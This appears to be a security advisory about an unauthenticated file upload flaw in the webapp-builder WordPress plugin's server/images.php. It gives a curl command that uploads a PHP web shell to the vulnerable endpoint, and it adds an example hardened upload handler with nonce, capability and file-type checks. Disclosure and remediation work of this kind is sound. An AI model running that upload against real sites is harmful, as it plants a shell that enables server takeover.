Title: Unrestricted File Upload vulnerability in WordPress Plugin webapp-builder v2.0
The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/

The code in file ./webapp-builder/server/images.php doesn't require authentication or check that the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.

See:

https://plugins.svn.wordpress.org/webapp-builder/trunk/server/images.php

$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/webapp-builder/server/images.php"
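
The checks this advisory says images.php lacks (authentication, an authorization check, and validation of the uploaded file), shown as an added example of a hardened handler using standard WordPress APIs. It is not the plugin's or the vendor's code. The action name wab_upload_image and the nonce field name are hypothetical; the form field name "file" is taken from the curl command above.

```php
<?php
// Added example (hypothetical handler, not code from webapp-builder).
// Assumption: the directly reachable server/images.php is removed and
// uploads go through admin-ajax.php, which loads WordPress and its
// authentication before this function runs.

// Registered only under wp_ajax_, with no wp_ajax_nopriv_ counterpart,
// so unauthenticated requests never reach the handler.
add_action('wp_ajax_wab_upload_image', 'wab_upload_image');

function wab_upload_image() {
    // Request forgery check: the nonce must have been issued for this action.
    check_ajax_referer('wab_upload_image', 'nonce');

    // Authorization: being logged in is not enough, the user needs the
    // upload capability. wp_send_json_error() ends the request.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }

    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        wp_send_json_error('no file received', 400);
    }

    // Allowlist of image types; anything else (including .php) is refused.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );

    // Compares the extension with the type detected from the file content,
    // so a script renamed to .jpg does not pass.
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed
    );
    if (!$check['ext'] || !$check['type']) {
        wp_send_json_error('file type not allowed', 415);
    }

    // wp_handle_upload() sanitizes the name, makes it unique and stores the
    // file under the uploads directory instead of the plugin directory.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload(
        $_FILES['file'], array('test_form' => false, 'mimes' => $allowed)
    );
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 400);
    }
    wp_send_json_success(array('url' => $result['url']));
}
```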